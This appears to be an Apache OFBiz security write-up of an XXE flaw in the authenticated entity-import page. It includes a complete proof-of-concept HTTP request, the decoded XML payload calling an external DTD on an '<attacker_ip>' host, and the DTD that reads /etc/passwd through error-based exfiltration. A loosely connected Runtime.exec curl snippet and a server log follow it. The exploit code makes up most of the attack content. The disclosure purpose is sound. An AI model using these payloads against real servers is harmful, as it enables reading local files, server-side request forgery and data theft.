Arbitrary Code Execution

This was reported to the OFBiz security team by Jason Nordenstam from offensive-security.com. We did not consider it as a real security issue because it requires authentication.

Authenticated users can import XML documents containing DTDs. The SAX parser used by the XML Data Import functionality does not have DTD parsing explicitly disabled which makes it vulnerable to XXE attacks.

The results of the import are not displayed in the page which means an 'error-based' approach is needed to read local files. The parser will also resolve external entities so this vulnerability can also be used for internal port scanning or server-side request forgery.
Affected URL:
/webtools/control/entityImport

POC Example Request:
POST /webtools/control/entityImport HTTP/1.1
Host:<host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <host>/webtools/control/entityImport
Content-Type: application/x-www-form-urlencoded
Content-Length: 312
Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
Connection: close
Upgrade-Insecure-Requests: 1

fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A

Payload One Decoded:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE notfound [
<!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
%base;
%param1;
%external;
]>
<root><foo>bar</bar></root>

error.dtd on Attacking Machine:
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >

Works using:

Runtime rt = Runtime.getRuntime();
rt.exec("curl https://demo-trunk.ofbiz.apache.org:9090/pingtest");

We get:

ofbizDemo@ofbiz-vm3:~$ python -m SimpleHTTPServer 9090
Serving HTTP on 0.0.0.0 port 9090 ...
172.31.43.132 - - [31/Aug/2019 07:37:00] code 400, message Bad request syntax ("\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\x900q\xa3\xae a\xc4\r\xb6eA\xd8\x0bv/\x13k\xce\x01Q\xd4\xd3\x87w\\I\xca\x8b~\xab\xa4 2Re|\xdc\xcb\x85p\x8f\x8e\xab\xee\x04*\xe7\xcb\xfd\xba\x0eu\x14z\x91\xedN\xbd\x91\xb3jy\xae\xc7\x00>\x13\x02\x13\x03\x13\x01\xc0,\xc00\x00\x9f\xcc\xa9\xcc\xa8\xcc\xaa\xc0+\xc0/\x00\x9e\xc0$\xc0(\x00k\xc0#\xc0'\x00g\xc0")
¦eA¦31.43.132 - - [31/Aug/2019 07:37:00] "¦¦0q¦¦ a¦
v/k¦Q¦?w\I?~¦¦ 2Re|¦?p¦¦¦¦*¦¦¦uz¦¦N¦¦¦jy¦¦>¦,¦0¦???¦+¦/¦¦$¦(k¦#¦'g¦" 400 -

Not sure what we can really do with that on OFBiz server side, but clearly something happens